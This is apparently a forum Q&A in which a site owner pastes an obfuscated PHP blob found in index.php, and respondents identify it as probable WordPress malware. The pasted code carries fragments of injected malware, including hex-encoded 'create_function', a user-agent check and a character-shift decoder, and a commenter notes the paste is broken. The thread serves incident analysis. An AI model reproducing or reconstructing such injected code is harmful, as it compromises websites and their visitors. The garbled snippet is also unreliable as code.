# Found this code in index.php on an unreachable site of mine ... What does it do?

Tags: security, code

!}   x27;!>>>!}_;gvc%}&;ftmbg}   x77{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#jw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H5#*%fdy!%tdz)%bbT-%bT-%hW~%fdy)##-!#~/7&6|7**111127-zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/#00#W6!2p%!*3>?*2b%)gpf{jt)!gj!pjudovg   x22)!gj}1~!52]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24hmg%!j%!|!*#d%62bd%!.%!> x22:ftmbg39*56mg%)!gj!~:,,Bjg!)%j:>>1*!%b:>1%s:  x5c%j:.2^,%b:%s:  x5c%j:^*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!]26  x24-    x24j%!*9!   x27!hnjA    x27&6!fyqmpef)#   x24*!   x24Yp   x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e";*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)!427]36]373P6]36]73]83]238M7]381]211M5]67]4*XAZASVu%VU#L4]275L3]248L3P6L1M5]D2P4]D6##]D6]281L1#/#M5]DgP5]D6##]D4]273]D6P2L5P6]y6gP7L6M7]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmj]31#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/00#*}&;!osvufs}  x7f;!o_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278])sutcvt)!gj!|!*bubE{h%)j{hnpd!opjud9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&dr_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#!"  x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" 6,#/q%>2q%q%V!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]48y]#>s%q%m%ldpt%}K;`ufldpt}X;`msvd}R;*str($uas,"   x61 156 x64 162 x6f 151 x64"))) { $hsbdriw = "  x63 162 function bknbpvb($n){return chr(ord($n)-1);} @error_repor2986+7**^/%rx111!%yy)#}#-#    x24-    x24-tusqpt)%>qp%!|Z~!!2p%!|!*!*jQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6##>>X)!gjZb%!**X)ufttj x22)gj!|!*nbsS,6! x242178}527}88:}334}472 x24/7rfs%:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+!>*4-1-bubE{h%SUT`LDPT7-UFOJ`GB)fubfsdX)%j>1^#zsfvr#    x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj632j%!*72!   x27!hmg%)!gjdovg}{;#)tutjyf`opjudov3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77zbek!~!b%Zb%!*(%w:!>!    x246767~6!bssbz)    x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x2j%7-K)udfoopdXA   x22)7gj6>}R;msv}.;/#/#/67j**b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+s`  x5c^>Ew:Qb:Qc:W~!%z!>21#p#/#p#/%z>2*A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|%}U;y]}R;2]},;osvufs}    x27;mnui}&;zep*!%i   x5c2^    x2272qj%)7gj6]D4]82]K6]72]K9]78]K5]53]Kc#!#]D&& (!isset($GLOBALS["   x61 156 x75 156 x61"])))) { $GLOBALS[_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpix::h%:n%!#]y84]2757,*e   x27,*d  x27,*c  x27,*b  x27)fepq%6!    x2400~:/h%:>  x22!pd%)!gj}Z;h!opju]y83]273]y76]277##]y74]273ovg!|!**#j{hnpd#)tutjyf`ogj5h%!! x24/%tmw/   x24)%-  x24*

Comment: Looks like gibberish. At the very least, it's not valid PHP code.

Comment: Oh, you didn't bother to format it correctly. It is valid PHP code, an obfuscated one.

Comment: The code you posted doesn't seen to be a faithful representation of the file - it's broken. I'm posting this to deter others from wasting their time.

Answer (score 3):

It's some obfuscated PHP code. I didn't bother (and don't see a use) to look any further than that.

- You can execute it from command line under an unprivileged account (or even better - from a VM so you can deny it network access - potentially to a database - in case it has embedded credentials) and see what happens.
- Yet I suggest you to try to deobfuscate it by hand as a brain teaser.

  - Note that you can run chunks of PHP code via the command line interpreter to make it do most of the work for you.

[A comment to an SO question about Wordpress](https://stackoverflow.com/questions/32917318/virus-on-wordpress-can-you-tell-me-how-i-can-compress-the-zipped-code-and-un#comment53662414_32917318) suggests this might be a stock Wordpress file.

Googling "php obfuscator "Silence is golden."" further, I found https://security.stackexchange.com/questions/128546/obfuscated-php-code-found-in-wordpress-core-files-and-plugins . Case closed.

Most likely, **this is a Wordpress virus.** All the more incentive for you to dissect it and see what it does. Well, and check that server of yours for anomalies - better from a rescue disk.